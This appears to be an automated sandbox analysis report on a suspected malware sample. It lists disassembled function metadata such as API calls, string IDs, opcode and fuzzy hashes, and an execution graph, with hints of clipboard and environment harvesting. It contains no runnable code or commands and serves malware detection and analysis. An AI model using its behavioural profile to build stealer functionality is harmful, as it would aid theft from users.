                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
                                                                            • Instruction ID: 639cff4bd66d4eed68713a8ae307c2d2d1180f9e9004782a502f2a6fa8fea26a
                                                                            • Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
                                                                            • Instruction Fuzzy Hash: 3D51CF72A00302AFEB29AF52C941B7A73A4EF40304F14853FE805672D1D739EC62C79A
                                                                            APIs
                                                                              • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                            • GetLastError.KERNEL32 ref: 0041B50B
                                                                            • __dosmaperr.LIBCMT ref: 0041B512
                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0041B54C
                                                                            • __dosmaperr.LIBCMT ref: 0041B553
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1913693674-0
                                                                            • Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
                                                                            • Instruction ID: cec987ca27f54d0df3a57789ab5f391b1316bc0051da666ab1eca3c5aeea150a
                                                                            • Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
                                                                            • Instruction Fuzzy Hash: 3221B671600215BFDB20EF66C8418ABB7ADFF043A8710852FF85997251D779ED9087D4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
                                                                            • Instruction ID: f8db4804455f599fb5fabd8b5f86bcd1d132503182311fbe19c9dedc91394c0d
                                                                            • Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
                                                                            • Instruction Fuzzy Hash: 8F21F9B1610205AFEB20AF62CC90DAB776CFF40368710452BF415D7252D7B9EDD097A8
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041C445
                                                                              • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C47D
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C49D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 158306478-0
                                                                            • Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
                                                                            • Instruction ID: cd346ceb72f841712861b774b6322b7d2f9c84398f992d5f92ec2fcb375f728e
                                                                            • Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
                                                                            • Instruction Fuzzy Hash: 091104B2A48515BF672127B25CDACFF6D5CDE99398310402AF802D2102EE2CDD8285BD
                                                                            APIs
                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000), ref: 004241FE
                                                                            • GetLastError.KERNEL32(?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8,?,00416E7D,?), ref: 0042420A
                                                                              • Part of subcall function 004241D0: CloseHandle.KERNEL32(FFFFFFFE,0042421A,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8,0040BDB8), ref: 004241E0
                                                                            • ___initconout.LIBCMT ref: 0042421A
                                                                              • Part of subcall function 00424192: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004241C1,00421C31,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 004241A5
                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00421C44,00000000,00000001,00000000,0040BDB8,?,004168BF,0040BDB8,00000000,00000000,0040BDB8), ref: 0042422F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                            • String ID:
                                                                            • API String ID: 2744216297-0
                                                                            • Opcode ID: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
                                                                            • Instruction ID: 4f4531f6176a0c5b6c9a7a905856594723a902087f3f8d784f297790ae8fc46e
                                                                            • Opcode Fuzzy Hash: ca09305258c16a54d0dcba451752d25af7c96ee1953d8ec0ee725fe34d53713b
                                                                            • Instruction Fuzzy Hash: C1F03736200124BBCF222FD5FC0899A7F26FB853B0F414065FA5995130C6319870AB99
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 0041033D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorHandling__start
                                                                            • String ID: pow
                                                                            • API String ID: 3213639722-2276729525
                                                                            • Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
                                                                            • Instruction ID: ba283ab10e86f0ff01337ebee0106e11519cd21400a500e12903ed81b54b832b
                                                                            • Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
                                                                            • Instruction Fuzzy Hash: CD517EB1A4A6068BCB117714DA413EB37A09B40701F604D6BE8D5413E9EB7D8CF69A4F
                                                                            APIs
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00401F9D
                                                                              • Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionRaise___std_exception_copy
                                                                            • String ID: ios_base::badbit set$ios_base::failbit set
                                                                            • API String ID: 3109751735-1240500531
                                                                            • Opcode ID: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
                                                                            • Instruction ID: 797d091bbb829d4e8b0eea89e00af225cce609620468ab5527f299f1bcc47ce9
                                                                            • Opcode Fuzzy Hash: 093cf63a05e0c9d9e505c411f0024045c7293edf30539a5a4b0b12754ed88584
                                                                            • Instruction Fuzzy Hash: 2D414771504301AFC304DF29C841A9BB7E8EF89310F14862FF994A76A1E778E945CB99
                                                                            APIs
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040A46F
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040A523
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 3480331319-1018135373
                                                                            • Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
                                                                            • Instruction ID: 2e999a1580a82348229a279466bd0bfc2513c0ac70a5a2249b741fcd72562a23
                                                                            • Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
                                                                            • Instruction Fuzzy Hash: 2741C834A00318ABCF10DF69C844A9E7BB0FF45314F1481A6E8146B3D2D779E961CB9A
                                                                            APIs
                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0040AD62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 2118026453-2084237596
                                                                            • Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
                                                                            • Instruction ID: a4c454b0bcb5eef0a2e58a0d06434270c6490fd8828ce8058ef1224e804d7477
                                                                            • Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
                                                                            • Instruction Fuzzy Hash: 4C416E71900209AFCF15DFA4CD81AEEBBB5FF48304F19846AF904B7291D3399960DB95
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407EAE
                                                                            • ___raise_securityfailure.LIBCMT ref: 00407F6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                            • String ID: @SC
                                                                            • API String ID: 3761405300-4053289583
                                                                            • Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
                                                                            • Instruction ID: 10e33e2e5eb9a3d5286ccbecc20551b6eaee076d59bf9c7ce06d7c1cd455d27c
                                                                            • Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
                                                                            • Instruction Fuzzy Hash: 2D11E3B4651A04DBD318CF15F8817883BA4BB28346B50B03AE8088B371E3B09595CF5E
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00401875
                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA
                                                                              • Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058C9
                                                                              • Part of subcall function 004058AA: _Yarn.LIBCPMT ref: 004058ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                            • String ID: bad locale name
                                                                            • API String ID: 1908188788-1405518554
                                                                            • Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
                                                                            • Instruction ID: 698a41e2f8890499ec269fe88a942146f7bab7e11b1414401b60b7a9d3f26e65
                                                                            • Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
                                                                            • Instruction Fuzzy Hash: 90F01D71515B408ED370DF3A8404743BEE0AF29714F048E2EE4CAD7A92E379E508CBA9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog3
                                                                            • String ID: A]@$pdB
                                                                            • API String ID: 431132790-1964063989
                                                                            • Opcode ID: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
                                                                            • Instruction ID: 9708e6e5fcb6faf266b2e239077eb0a834cba51f5faa1665736d4655e106cb5a
                                                                            • Opcode Fuzzy Hash: a80e33e7d8d27686206c715740f2a372a192bd8069830a42d80d814282e980e6
                                                                            • Instruction Fuzzy Hash: AE01D6B4A00615CFC761DF68C580A5ABBF0FF08344B51896EE489DB751D7B5AA40CF98

                                                                            Execution Graph

                                                                            Execution Coverage:1.2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:44
                                                                            Total number of Limit Nodes:8
                                                                            execution_graph 16778 ef7ede 16779 ef7d03 16778->16779 16781 ef7bb0 16778->16781 16780 ef7cf3 16781->16780 16784 ef7560 LdrInitializeThunk 16781->16784 16783 ef7c71 16784->16783 16785 eed7fc 16786 eed82c 16785->16786 16787 eed88e 16786->16787 16789 ef7560 LdrInitializeThunk 16786->16789 16789->16786 16795 ebd2c0 16796 ebd2c9 16795->16796 16797 ebd4ae ExitProcess 16796->16797 16798 ebd2d1 GetInputState 16796->16798 16799 ebd2de 16798->16799 16800 ebd2e6 GetCurrentThreadId GetCurrentProcessId 16799->16800 16804 ebd4a4 16799->16804 16802 ebd311 16800->16802 16802->16804 16808 ec2290 CoInitialize 16802->16808 16805 ef6f80 16804->16805 16809 ef8440 16805->16809 16807 ef6f85 FreeLibrary 16807->16797 16810 ef8449 16809->16810 16810->16807 16811 efa7e0 16813 efa7f0 16811->16813 16812 efa93e 16813->16812 16815 ef7560 LdrInitializeThunk 16813->16815 16815->16812 16816 ef7600 16817 ef7624 16816->16817 16819 ef79ab 16817->16819 16820 ef7a4e 16817->16820 16821 ef797e 16817->16821 16824 ef7560 LdrInitializeThunk 16817->16824 16820->16819 16822 ef7560 LdrInitializeThunk 16820->16822 16821->16819 16821->16820 16825 ef7560 LdrInitializeThunk 16821->16825 16822->16820 16824->16821 16825->16820 16826 efac00 16828 efac25 16826->16828 16827 efad3e 16829 efac8f 16828->16829 16832 ef7560 LdrInitializeThunk 16828->16832 16829->16827 16833 ef7560 LdrInitializeThunk 16829->16833 16832->16829 16833->16827 16834 ef4200 16835 ef421a 16834->16835 16836 ef4246 RtlAllocateHeap 16834->16836 16835->16836

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExitInputStateThread
                                                                            • String ID: 'GFA$edgf
                                                                            • API String ID: 1029096631-957644222
                                                                            • Opcode ID: 45c5c23126ae7e4ba7fb52036ca6ebf396d2252831db497a069a124e571cd742
                                                                            • Instruction ID: f59c209f71d9bee06a8700c1b675b4dc0e42aef317161d6cfff2e9044adbc89d
                                                                            • Opcode Fuzzy Hash: 45c5c23126ae7e4ba7fb52036ca6ebf396d2252831db497a069a124e571cd742
                                                                            • Instruction Fuzzy Hash: 0541697440D2809BC301BF28D944A6EFBE5EF52709F18AD1CE1C4A7262E73AD850CB67

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 240 ef7560-ef7592 LdrInitializeThunk
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(00EF4FF1,00000001,00000005,?,00000000,?,?,00ED14D5), ref: 00EF758E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: 7654$7654
                                                                            • API String ID: 2994545307-1888865020
                                                                            • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                            • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                            • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 268 ef4200-ef4218 269 ef421a 268->269 270 ef4246-ef4260 RtlAllocateHeap 268->270 271 ef4220-ef4244 call ef73f0 269->271 271->270
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00EF4257
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 9968c55321636e139e56dd253f7dbd1eee683775de6c4d55efbbdfdaa40e30e3
                                                                            • Instruction ID: f2419e22c5a19265f8cff09c66c239d4f7bb2f49b03830790ee22f32140f503a
                                                                            • Opcode Fuzzy Hash: 9968c55321636e139e56dd253f7dbd1eee683775de6c4d55efbbdfdaa40e30e3
                                                                            • Instruction Fuzzy Hash: 38F03A7410C244AFD705FB58E941A1EFBE5EB55701F44882CF5C497262C235E824DB63

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 274 ef6f80-ef6f91 call ef8440 FreeLibrary
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(00EBD4AE), ref: 00EF6F8B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 877202408e75cf8aa1609e2dbc48084d15e6446fe1adb30e26f4a3b7423a30a8
                                                                            • Instruction ID: 2e1d1b88016bede9f5a30e1441bf347d03e7914c7143e398382040fcc2e8bbf6
                                                                            • Opcode Fuzzy Hash: 877202408e75cf8aa1609e2dbc48084d15e6446fe1adb30e26f4a3b7423a30a8
                                                                            • Instruction Fuzzy Hash: CFA0023081414DDBDE457B21EE095193A62B74470A310A094BF59A1036CE217430FA25
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                            • String ID: 3$?$e
                                                                            • API String ID: 2832541153-3975470078
                                                                            • Opcode ID: efa143f1eb6e17d2ed7f4d284932e0e37df07a8e63f4ad72eeda8cf10766a593
                                                                            • Instruction ID: 68548f3fa6fb64867a73284ded885a6caf2dc2e81fe640c1d2914cb0ef7746a7
                                                                            • Opcode Fuzzy Hash: efa143f1eb6e17d2ed7f4d284932e0e37df07a8e63f4ad72eeda8cf10766a593
                                                                            • Instruction Fuzzy Hash: 34417C7000C7C28ED311EF3D948876EBFE0AB92324F154A6DE4EA96292C7758549C7A3
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: String$Free$Variant$ClearInit
                                                                            • String ID: 4`[b$7654
                                                                            • API String ID: 4205145696-3675246634
                                                                            • Opcode ID: ca13f4365a3e5855d471e782ddb04ac62db19622a277fffaa15460d50ee89886
                                                                            • Instruction ID: 944a85c0044615835dde7fb801bc27e1e75d778560c210b7fb33ef81cd6ccc82
                                                                            • Opcode Fuzzy Hash: ca13f4365a3e5855d471e782ddb04ac62db19622a277fffaa15460d50ee89886
                                                                            • Instruction Fuzzy Hash: 31E1DCB5A08209DFDB00DF68EC81BAEBBB1FB89305F144828E685E7291D735E905DB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: ,/$4`[b$7654
                                                                            • API String ID: 2525500382-138038313
                                                                            • Opcode ID: c5cf7ec7939a7aa5877241a8fd9f2070f3a2e00aa89555c31aa2326548e6114c
                                                                            • Instruction ID: b3f8dd201e3e9557bffeb1a06ed1c5e7b03557d9aad8910b451218763327dab7
                                                                            • Opcode Fuzzy Hash: c5cf7ec7939a7aa5877241a8fd9f2070f3a2e00aa89555c31aa2326548e6114c
                                                                            • Instruction Fuzzy Hash: 88E1CFB5A08349EFDB109F68DC81B6EBBB1FB89305F14482CF685A7291D735D910CB62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P
                                                                            • API String ID: 0-1343716551
                                                                            • Opcode ID: c5e1547b7f4b3dbcc3c7432435c6cb330687a23bc4a0bc2288e3acd97ccbcf6d
                                                                            • Instruction ID: 97d2d45703c96fc8b32681eb25ec9fc0dd96440ef56157b183cce4ed1a73705a
                                                                            • Opcode Fuzzy Hash: c5e1547b7f4b3dbcc3c7432435c6cb330687a23bc4a0bc2288e3acd97ccbcf6d
                                                                            • Instruction Fuzzy Hash: C121A5F0904B40AFD360EF3AC90675BBEE8EB49350F104A1DF8AA87791D371A4458BD6
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true
                                                                            • Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                            • API String ID: 2610073882-164105402
                                                                            • Opcode ID: 22a8f1c66469840082745c944c2aa0fd83b1475a1beabed724104313cf0ba7db
